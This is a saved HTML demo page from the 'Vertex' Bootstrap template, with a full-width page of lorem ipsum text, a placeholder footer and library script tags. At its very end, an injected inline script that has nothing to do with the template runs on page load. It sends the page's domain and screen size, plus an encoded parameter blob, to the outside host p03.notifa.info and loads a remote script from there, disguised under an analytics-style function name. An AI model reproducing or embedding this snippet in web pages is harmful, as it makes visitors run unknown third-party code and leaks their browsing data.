                        <span class="tob-sub-title text-color-primary d-block">LITLE BIT ABOUT US</span>
                        <h1>Full Width Page</h1>
                        <p class="lead">Lorem ipsum dolor sit amet, consectetur adipiscing elit.</p>
                    </div>
                    <div class="col-md-4">
                        <ul class="breadcrumb justify-content-start justify-content-md-end mb-0">
                            <li><a href="index_2.html">Pages</a></li>
                            <li class="active">Full Width Page</li>
                        </ul>
                    </div>
                </div>
            </div>
        </section>

        <div class="v-page-wrap">

            <div class="container">

                <div class="row">
                    <div class="col-sm-12">

                        <div class="v-animation"  data-aos="fade-up" data-aos-delay="200">

                            <figure class="lightbox animated-overlay overlay-alt clearfix">
                                <img width="2000" height="957" src="http://bootstraptemplates.net/vertex/img/mix/img2.jpg" class="attachment-full" />
                                <a class="view" href="http://bootstraptemplates.net/vertex/img/mix/img2.jpg" rel="image-gallery"></a>
                                <figcaption>
                                    <div class="thumb-info thumb-info-v2">
                                        <i class="fa fa-eye"></i>
                                    </div>
                                </figcaption>
                            </figure>
                        </div>

                        <div class="v-spacer col-sm-12 v-height-small"></div>

                        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec non mauris diam. Vivamus ante lorem, semper ut hendrerit nec, commodo quis lectus. Donec eu massa eu lacus rutrum adipiscing eget nec metus. Nulla eu lacus sit amet lorem rutrum imperdiet. Morbi lacus neque, feugiat laoreet elementum ut, imperdiet sed risus. Nam vulputate est id risus mattis eu consequat libero ullamcorper. Nam viverra, ante ut facilisis ullamcorper, justo enim vehicula augue, vel congue lacus diam ac lectus. Aliquam rutrum malesuada massa, id rhoncus sapien venenatis id. Praesent mauris est, tempor at luctus eu, condimentum eget arcu. Curabitur et ligula justo. In hac habitasse platea dictumst. Ut fringilla viverra erat, ut iaculis nisi interdum commodo. Vivamus interdum elementum tortor, a adipiscing magna auctor sed. Donec gravida ante at est laoreet a blandit sem rhoncus.</p>
                        <p>Sed tristique tincidunt congue. Fusce condimentum scelerisque felis in imperdiet. Suspendisse potenti. Aliquam molestie egestas sapien commodo vulputate. Donec est turpis, cursus ac viverra in, mollis sit amet felis. Nullam tincidunt pulvinar mauris. Nullam vel sem sapien, id mollis velit. Integer libero ligula, hendrerit dictum luctus sit amet, cursus a neque. Proin molestie nunc vel ipsum posuere tristique. Nullam neque velit, fringilla et porta fringilla, vehicula ac mi. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Maecenas rutrum eros in lacus interdum ultricies. Aenean sit amet faucibus nulla. Aliquam cursus tincidunt posuere. Nunc sapien elit, accumsan non accumsan ac, ultrices non urna. Phasellus diam purus, rutrum vitae euismod ut, lobortis quis velit.</p>
                        <p>Cras ultrices, lacus sed tincidunt malesuada, arcu augue cursus est, nec tempor purus urna et mauris. Curabitur a nulla eget urna bibendum consectetur. Nulla commodo sapien nec augue sagittis feugiat. Morbi aliquet, erat eget tempor consectetur, diam lectus lacinia est, a rutrum sem elit vel urna. Nunc ultricies posuere dui ut iaculis. Curabitur placerat quam sed purus vulputate facilisis. Duis vel elit molestie odio dapibus tempor. Mauris porttitor, purus ut sollicitudin accumsan, enim justo interdum tortor, sed porta ipsum nibh ut libero. Morbi tristique molestie dapibus. Ut vitae ipsum elit. Vestibulum a volutpat odio. Etiam tristique fringilla tempus. Curabitur tortor nulla, ullamcorper id fermentum non, cursus vel turpis. Maecenas feugiat scelerisque urna sit amet tempus. Sed tempus nibh eget mauris tristique venenatis.</p>
                        <p>Sed tristique tincidunt congue. Fusce condimentum scelerisque felis in imperdiet. Suspendisse potenti. Aliquam molestie egestas sapien commodo vulputate. Donec est turpis, cursus ac viverra in, mollis sit amet felis. Nullam tincidunt pulvinar mauris. Nullam vel sem sapien, id mollis velit. Integer libero ligula, hendrerit dictum luctus sit amet, cursus a neque. Proin molestie nunc vel ipsum posuere tristique. Nullam neque velit, fringilla et porta fringilla, vehicula ac mi. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Maecenas rutrum eros in lacus interdum ultricies. Aenean sit amet faucibus nulla. Aliquam cursus tincidunt posuere. Nunc sapien elit, accumsan non accumsan ac, ultrices non urna. Phasellus diam purus, rutrum vitae euismod ut, lobortis quis velit.</p>
                        <p>Cras ultrices, lacus sed tincidunt malesuada, arcu augue cursus est, nec tempor purus urna et mauris. Curabitur a nulla eget urna bibendum consectetur. Nulla commodo sapien nec augue sagittis feugiat. Morbi aliquet, erat eget tempor consectetur, diam lectus lacinia est, a rutrum sem elit vel urna. Nunc ultricies posuere dui ut iaculis. Curabitur placerat quam sed purus vulputate facilisis. Duis vel elit molestie odio dapibus tempor. Mauris porttitor, purus ut sollicitudin accumsan, enim justo interdum tortor, sed porta ipsum nibh ut libero. Morbi tristique molestie dapibus. Ut vitae ipsum elit. Vestibulum a volutpat odio. Etiam tristique fringilla tempus. Curabitur tortor nulla, ullamcorper id fermentum non, cursus vel turpis. Maecenas feugiat scelerisque urna sit amet tempus. Sed tempus nibh eget mauris tristique venenatis.</p>
                        <p>Vestibulum a volutpat odio. Etiam tristique fringilla tempus. Curabitur tortor nulla, ullamcorper id fermentum non, cursus vel turpis. Maecenas feugiat scelerisque urna sit amet tempus. Sed tempus nibh eget mauris tristique venenatis.  Vestibulum a volutpat odio. Etiam tristique fringilla tempus. Curabitur tortor nulla, ullamcorper id fermentum non, cursus vel turpis. Maecenas feugiat scelerisque urna sit amet tempus. Sed tempus nibh eget mauris tristique venenatis.</p>
                    </div>
                </div>
            </div>
        </div>

        <!--Footer-Wrap-->
        <div class="footer-wrap">
            <footer>
                <div class="container">
                    <div class="row">
                        <div class="col-sm-3">
                            <section class="widget">
                                <img alt="Vertex" src="img/logo-white_2.png" style="height: 40px; margin-bottom: 20px;">
                                <p class="pull-bottom-small">
                                    Donec quam felis, ultricies nec, pellen tesqueeu, pretium quis, sem. Nulla consequat massa quis enim. Donec pede justo, fringilla vel aliquet nec, vulputate eget aliquet nec, arcu.
                                </p>
                                <p>
                                    <a href="page-about-us-2_2.html">Read More →</a>
                                </p>
                            </section>
                        </div>
                        <div class="col-sm-3">
                            <section class="widget v-twitter-widget">
                                <div class="widget-heading">
                                    <h4>Latest Tweets</h4>
                                    <div class="horizontal-break"></div>
                                </div>
                                <ul class="v-twitter-widget">
                                    <li>
                                        <div class="tweet-text">
                                            <a href="page-full-width_2.html#" target="_blank">@Vertex</a>
                                            Lorem ipsum dolor sit amet, consec adipiscing elit onvallis dignissim.
                                        </div>
                                        <div class="twitter_intents">
                                            <a class="timestamp" href="page-full-width_2.html#" target="_blank">3 hours ago</a>
                                        </div>
                                    </li>
                                    <li>
                                        <div class="tweet-text">
                                            <a href="page-full-width_2.html#" target="_blank">@Vertex</a>
                                            Sed blandit conval dignissim. pharetra velit eu velit et erat pharetra.
                                        </div>
                                        <div class="twitter_intents">
                                            <a class="timestamp" href="page-full-width_2.html#" target="_blank">5 days ago</a>
                                        </div>
                                    </li>
                                </ul>
                            </section>
                        </div>
                        <div class="col-sm-3">
                            <section class="widget v-recent-entry-widget">
                                <div class="widget-heading">
                                    <h4>Recent Posts</h4>
                                    <div class="horizontal-break"></div>
                                </div>
                                <ul>
                                    <li>
                                        <a href="blog-standard-post_2.html">Amazing Standard Post</a>
                                    </li>
                                    <li>
                                        <a href="blog-full-width-post_2.html">Full Width Media Post</a>
                                    </li>
                                    <li>
                                        <a href="http://bootstraptemplates.net/vertex/blog-video-post.html">Perfect Video Post</a>
                                    </li>
                                    <li>
                                        <a href="http://bootstraptemplates.net/vertex/blog-slideshow-post.html">Amazing Slideshow post</a>
                                    </li>
                                </ul>
                            </section>
                        </div>
                        <div class="col-sm-3">
                            <section class="widget">
                                <div class="widget-heading">
                                    <h4>Recent Works</h4>
                                    <div class="horizontal-break"></div>
                                </div>
                                <ul class="portfolio-grid">
                                    <li>
                                        <a href="portfolio-single_2.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-1_2.jpg" />
                                            <span class="tooltip">Phasellus enim libero<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single_2.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-2_2.jpg" />
                                            <span class="tooltip">Phasellus enim libero<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single_2.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-3_2.jpg" />
                                            <span class="tooltip">Phasellus enim<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single_2.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-4_2.png" />
                                            <span class="tooltip">Lorem Imput<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single_2.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-5_2.jpg" />
                                            <span class="tooltip">Phasellus Enim libero<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                    <li>
                                        <a href="portfolio-single_2.html" class="grid-img-wrap">
                                            <img src="img/thumbs/project-6_2.jpg" />
                                            <span class="tooltip">Phasellus Enim<span class="arrow"></span></span>
                                        </a>
                                    </li>
                                </ul>
                            </section>
                        </div>
                    </div>
                </div>
            </footer>

            <div class="copyright">
                <div class="container">
                    <p>© Copyright 2018 by Vertex. All Rights Reserved.</p>

                    <div class="clearfix pull-right">
                        <a href="page-full-width_2.html#" class="social-icon si-borderless si-facebook mb-0" title="Facebook">
                            <i class="si-icon-facebook"></i>
                            <i class="si-icon-facebook"></i>
                        </a>
                        <a href="page-full-width_2.html#" class="social-icon si-borderless si-twitter mb-0" title="Twitter">
                            <i class="si-icon-twitter"></i>
                            <i class="si-icon-twitter"></i>
                        </a>
                        <a href="page-full-width_2.html#" class="social-icon si-borderless si-instagram mb-0" title="Instagram">
                            <i class="si-icon-instagram"></i>
                            <i class="si-icon-instagram"></i>
                        </a>
                        <a href="page-full-width_2.html#" class="social-icon si-borderless si-vk mb-0" title="Vk">
                            <i class="si-icon-vk"></i>
                            <i class="si-icon-vk"></i>
                        </a>
                    </div>
                </div>
            </div>
        </div>
        <!--End Footer-Wrap-->
    </div>

    <!-- Libs -->
    <script src="js/jquery.min_2.js"></script>
    <script src="js/popper_2.js"></script>
    <script src="js/bootstrap.min_2.js"></script>
    <script src="js/jquery.flexslider-min_2.js"></script>
    <script src="js/jquery.easing_2.js"></script>
    <script src="js/jquery.fitvids_2.js"></script>
    <script src="js/jquery.carouFredSel.min_2.js"></script>
    <script src="js/jquery.validate_2.js"></script>
    <script src="js/theme-plugins_2.js"></script>
    <script src="js/jquery.isotope.min_2.js"></script>
    <script src="js/imagesloaded_2.js"></script>

    <script src="http://bootstraptemplates.net/vertex/js/view.min_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/plugins/aos/aos_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/js/theme-core_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/js/theme_2.js"></script>
    <script src="http://bootstraptemplates.net/vertex/js/theme.init_2.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH26U7Hc7xnlRYSV%2boyF4kXPkIgdO31mPHiDbl4XqLci1q5uVWfP0T924UruOMRXLVj72L1As2v%2bMn6D4e9aP4Ad2ZTvMTfwZrMaKc0F8mnM8Z9fOIZ%2fjYR4qEqnDPmOzM%2fmquVUBDOq6ZevNM2GQiJfdmJCjam%2frpA2AEbRhO8lC2tjRLoYreeiBGJHdGBu%2fJjDSyoh%2fXSOspzzRx5%2bqdXVy6YR3tzFOYq%2b8Bs7OR5z85faDWGLDy%2fnAO63gObbqO2SKt3nZHteVM%2f3%2bMi2LTwezPk5MySDxHte7%2foySZdr%2fd6JNkDfkFke2ZBXzQdQkwcrco8q3tSvsPxo4PxuS3UD3y%2fq%2fnkfafFWaF8kxefi0snDufYBUsNG7kID3h4kjO%2ffV6BVdvcQTGJgL1EkoTSpiv3fB%2b2piu15D9ufzf%2bl3P600YkVAcmxyen373FvTCPMZCsc8lMDE%2bUVJMHhY66HcWRrmHKHLgaO7Axrgh7E2aRBsNZLNK7wYAYkqA1oCaKVxVsHd%2b67d4%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>